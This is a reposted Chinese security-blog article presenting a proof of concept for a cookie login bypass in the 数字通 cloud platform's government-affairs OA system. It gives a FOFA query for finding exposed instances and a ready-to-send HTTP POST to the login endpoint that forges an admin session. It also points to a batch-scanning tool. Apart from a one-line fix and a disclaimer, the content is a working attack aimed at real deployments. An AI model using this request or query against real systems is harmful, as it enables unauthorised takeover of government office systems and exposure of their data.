数字通云平台智慧政务cookie登录绕过漏洞 PoC

admin
admin
admin
138858
文章
114
评论
2024年11月21日10:35:36评论49 views字数 835阅读2分47秒阅读模式
简介
数字通云平台的智慧政务OA产品,依托云计算、大数据和人工智能等前沿技术,专为政府部门设计,旨在提升办公效率、协作能力和信息共享水平,推动电子政务向更高层次的发展。由中科数字通(北京)科技有限公司研发的这套全新智慧办公系统,包含了9大类、50多个核心功能模块,致力于为政府机关提供先进的协同办公解决方案。
数字通云平台智慧政务cookie登录绕过漏洞 PoC
漏洞描述
数字通云平台的智慧政务系统存在登录绕过漏洞,在OA系统的login接口中存在未授权访问默认cookie的风险,未经身份验证的远程攻击者可利用此漏洞伪造登录,从而获得对系统的完全控制权限。
fofa语法
body="assets/8cca19ff/css/bootstrap-yii.css"
漏洞复现
POST /portal/default/login HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1Priority: u=0, iContent-Type: application/x-www-form-urlencodedContent-Length: 22userID=admin&flag=rone
数字通云平台智慧政务cookie登录绕过漏洞 PoC
数字通云平台智慧政务cookie登录绕过漏洞 PoC
数字通云平台智慧政务cookie登录绕过漏洞 PoC
批量检测(批量检测POC工具请在公众号知识星球获取):
数字通云平台智慧政务cookie登录绕过漏洞 PoC
修复建议
禁用默认获取cookie接口

原文始发于微信公众号(白帽攻防):【漏洞复现】数字通云平台智慧政务cookie登录绕过漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月21日10:35:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   数字通云平台智慧政务cookie登录绕过漏洞 PoChttp://cn-sec.com/archives/3418898.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息